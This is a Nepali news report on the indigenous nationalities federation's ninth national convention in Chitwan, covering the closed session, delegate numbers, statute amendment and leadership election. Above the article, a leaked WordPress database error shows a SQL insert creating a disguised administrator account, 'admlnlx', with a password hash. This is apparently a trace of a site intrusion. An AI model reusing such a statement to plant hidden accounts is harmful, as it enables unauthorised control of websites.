WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B3CEozHz1VtZZvQMm1g5vmjZRkEM0G/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 11:07:38', '', 'admlnlx', 'admlnlx')
चितवन, पुस ३–
चितवनमा शनिबारदेखि सुरु भएको नेपाल आदिवासी जनजाति महासंघको नवौं राष्ट्रिय महाधिवेशन अन्तरगत आज साँझदेखि बन्द सत्र सुरु भएको छ ।
नारायणगढस्थित नारायणी कलामन्दिरमा सुरु भएको बन्द सत्रमा तीन वर्ष अवधिमा गएिका क्रियाकलापको समिक्षा र भावी एजेण्डाको विषयमा वृहत छलफल भईरहेको केन्द्रीय अध्यक्ष नगेन्द्र कुमालले जानकारी दिनुभयो । विहानदेखि बन्द सत्र सुरु गर्ने भनिएपछि केही जातिय संगठनको प्रतिनिधिको विषयमा विवाद भएपछि साँझबाट मात्र बन्द सत्र सुरु भएको हो ।
महाधिवेशनमा २२ वटा विदेश शाखा, ७१ वटा जिल्ला समन्वय परिषद र ६५ वटा महासंघमा आवद्ध जातिय संस्थाबाट ४ सय २२ जना प्रतिनिधि, पर्यवेक्षकहरु सहभागी भएको जनजाति महासंघका महासचिव पेम्वा भोटेले जानकारी दिनुभयो ।

यो पटकको महाधिवेशनले महासंघको विधान संशोधन सँगै तीनवर्षे कार्यकालका लागि नयाँ नेतृत्व चयन गर्ने छ । यसअघिको विधानमा १३ सदस्यीय सचिवालय सदस्य रहने व्यवस्था थियो । त्यसलाई संशोधन गरेर संघीयताकै खाकामा १९ सदस्यीय बनाउने तयारी भएको महासंघले जनाएको छ । पौष २ गतेदेखि पौष ४ गते सम्म चितवनमा महाधिवेशन चल्नेछ । महाधिवेशनमा महासंघको विद्यान संशोधन सँगै महासंघको भावि योजना र जनजाति आन्दोलनका उपलव्धीको विषयमा समेत छलफल हुने छ । छलफलबाट निस्कीएको निश्कर्षपछि चितवन घोषणा पत्र जारी गर्दै महाधिवेशन सकिनेछ । र तीनवर्षे कार्यकालका लागि नयाँ कार्यसमिति चयन गर्नेछ ।